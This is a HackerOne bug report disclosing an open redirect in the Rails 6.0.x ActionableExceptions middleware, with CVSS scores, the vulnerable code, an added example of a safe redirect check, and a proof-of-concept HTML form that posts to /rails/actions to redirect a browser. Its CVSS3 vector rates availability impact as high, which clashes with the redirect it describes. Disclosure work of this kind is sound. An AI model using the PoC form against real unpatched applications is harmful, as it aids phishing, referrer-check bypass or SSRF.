hackerone ooooooo_q H1:904059

Ruby on Rails: Open Redirect (6.0.0 < rails < 6.0.3.2)

2020-06-21 02:15:14
ooooooo_q
hackerone.com
$1000
174

CVSS3: 6.5 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVSS2: 4.3 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS: 0.001 Low
Percentile: 35.2%

Hello,
I was looking at the change log (https://github.com/rails/rails/commit/2121b9d20b60ed503aa041ef7b926d331ed79fc2) for CVE-2020-8185 and found that another problem existed.

https://github.com/rails/rails/blob/v6.0.3.1/actionpack/lib/action_dispatch/middleware/actionable_exceptions.rb#L21

# Excerpt of ActionDispatch::ActionableExceptions at v6.0.3.1 (the linked file).
def call(env)
  request = ActionDispatch::Request.new(env)
  return @app.call(env) unless actionable_request?(request)

  ActiveSupport::ActionableError.dispatch(request.params[:error].to_s.safe_constantize, request.params[:action])

  # The redirect target is taken from the request parameters and passed on unchecked.
  redirect_to request.params[:location]
end

private
  def actionable_request?(request)
    request.show_exceptions? && request.post? && request.path == endpoint
  end

  def redirect_to(location)
    body = "<html><body>You are being <a href=\"#{ERB::Util.unwrapped_html_escape(location)}\">redirected</a>.</body></html>"

    [302, {
      "Content-Type" => "text/html; charset=#{Response.default_charset}",
      "Content-Length" => body.bytesize.to_s,
      "Location" => location,
    }, [body]]
  end

This is an open redirect: the location request parameter is placed in the Location header without any validation.
In 6.0.3.2 the condition in actionable_request? has changed, so this problem is less likely to occur.
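The middleware above forwards whatever location it receives. As an added example (not code from the report or from Rails), here is the same redirect helper with a hypothetical safe_location check that only honours absolute paths on the current host or absolute URLs whose host matches the request host, falling back to "/" otherwise:

```ruby
require "uri"
require "erb"

# Added example, not Rails code. safe_location and FALLBACK_LOCATION are
# hypothetical names; request_host is the hostname (without port) the
# request was addressed to.
FALLBACK_LOCATION = "/"

def safe_location(location, request_host)
  return FALLBACK_LOCATION unless location.is_a?(String) && !location.strip.empty?

  uri = URI.parse(location)
  if uri.host.nil?
    # No authority part: accept only a genuine absolute path. "//evil" has a
    # host and never reaches here; "javascript:..." has a scheme and is rejected.
    ok = uri.scheme.nil? && location.start_with?("/") && !location.start_with?("//")
    return ok ? location : FALLBACK_LOCATION
  end

  # Absolute URL: require http(s) and a host equal to our own.
  same_host = %w[http https].include?(uri.scheme) && uri.host.casecmp?(request_host)
  same_host ? location : FALLBACK_LOCATION
rescue URI::InvalidURIError
  # Unparsable input (spaces, backslashes, ...) is never a valid redirect target.
  FALLBACK_LOCATION
end

# Same shape as the vulnerable helper, but both the Location header and the
# anchor use the vetted target instead of the raw parameter.
def redirect_to(location, request_host)
  target = safe_location(location, request_host)
  body = "<html><body>You are being <a href=\"#{ERB::Util.html_escape(target)}\">redirected</a>.</body></html>"

  [302, {
    "Content-Type" => "text/html; charset=utf-8",
    "Content-Length" => body.bytesize.to_s,
    "Location" => target,
  }, [body]]
end
```

With this check the PoC's location=https://www.hackerone.com/ parameter is replaced by "/" when the application is served from localhost.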

PoC

1. Prepare server

Prepare a vulnerable Rails 6.0.3.1 server.

❯ rails -v
Rails 6.0.3.1

❯ RAILS_ENV=production rails s
...
* Environment: production
* Listening on tcp://0.0.0.0:3000

2. Attack server

Serve the attack page from another port.

attack.html:

<form method="post" action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=https://www.hackerone.com/">
	<button type="submit">click!</button>
</form>

❯ python3 -m http.server 8000

3. Open browser

Open http://localhost:8000/attack.html in your browser and click the button.
The browser is redirected to https://www.hackerone.com/.

[attachment F876518]

Impact

It will be fixed in 6.0.3.2 together with CVE-2020-8185 (https://groups.google.com/g/rubyonrails-security/c/pAe9EV8gbM0), but I think it needs to be announced separately because the scope of impact is different.

This open redirect turns a POST request into a GET request, so it may be difficult to use for phishing. On the other hand, it may help bypass referrer checks or be usable for SSRF.
